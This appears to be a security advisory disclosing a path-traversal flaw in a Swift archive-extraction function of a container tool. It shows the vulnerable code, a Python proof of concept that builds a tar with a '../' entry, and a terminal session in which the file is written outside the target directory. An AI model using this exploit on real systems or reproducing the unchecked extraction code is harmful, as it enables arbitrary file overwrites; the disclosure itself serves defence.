GHSA-cq3j-qj2h-6rv3

/// Extracts the contents of an archive to the provided directory. /// Currently only handles regular files and directories present in the archive. public func extractContents(to directory: URL) throws { let fm = FileManager.default var foundEntry = false for (entry, data) in self { guard let p = entry.path else { continue } foundEntry = true let type = entry.fileType let target = directory.appending(path: p) switch type { case .regular: try data.write(to: target, options: .atomic) case .directory: try fm.createDirectory(at: target, withIntermediateDirectories: true) case .symbolicLink: guard let symlinkTarget = entry.symlinkTarget, let linkTargetURL = URL(string: symlinkTarget, relativeTo: target) else { continue } try fm.createSymbolicLink(at: target, withDestinationURL: linkTargetURL) default: continue } chmod(target.path(), entry.permissions) if let owner = entry.owner, let group = entry.group { chown(target.path(), owner, group) } } guard foundEntry else { throw ArchiveError.failedToExtractArchive("no entries found in archive") } }

#! /usr/bin/env python3 import tarfile import io import time tar_path = "evil.tar" # Content of the file inside the tar payload = b"pwned\n" with tarfile.open(tar_path, "w") as tar: info = tarfile.TarInfo( name="../../../../../../../../../../../tmp/pwned.txt" ) info.size = len(payload) info.mtime = int(time.time()) info.mode = 0o644 tar.addfile(info, io.BytesIO(payload)) print(f"Created {tar_path}")

% ./make-evil-tar.py Created evil.tar % mv evil.tar /tmp % cd /tmp % ls pwned.txt ls: pwned.txt: No such file or directory % ~/projects/jglogan/containerization/bin/cctl images load -i evil.tar Error: notFound: "/var/folders/6k/tnyh0vfd07z0f9mr5cg7zs5r0000gn/T/8493984C-33AE-44BB-91BB-AE486F3095FC/oci-layout" % cat pwned.txt pwned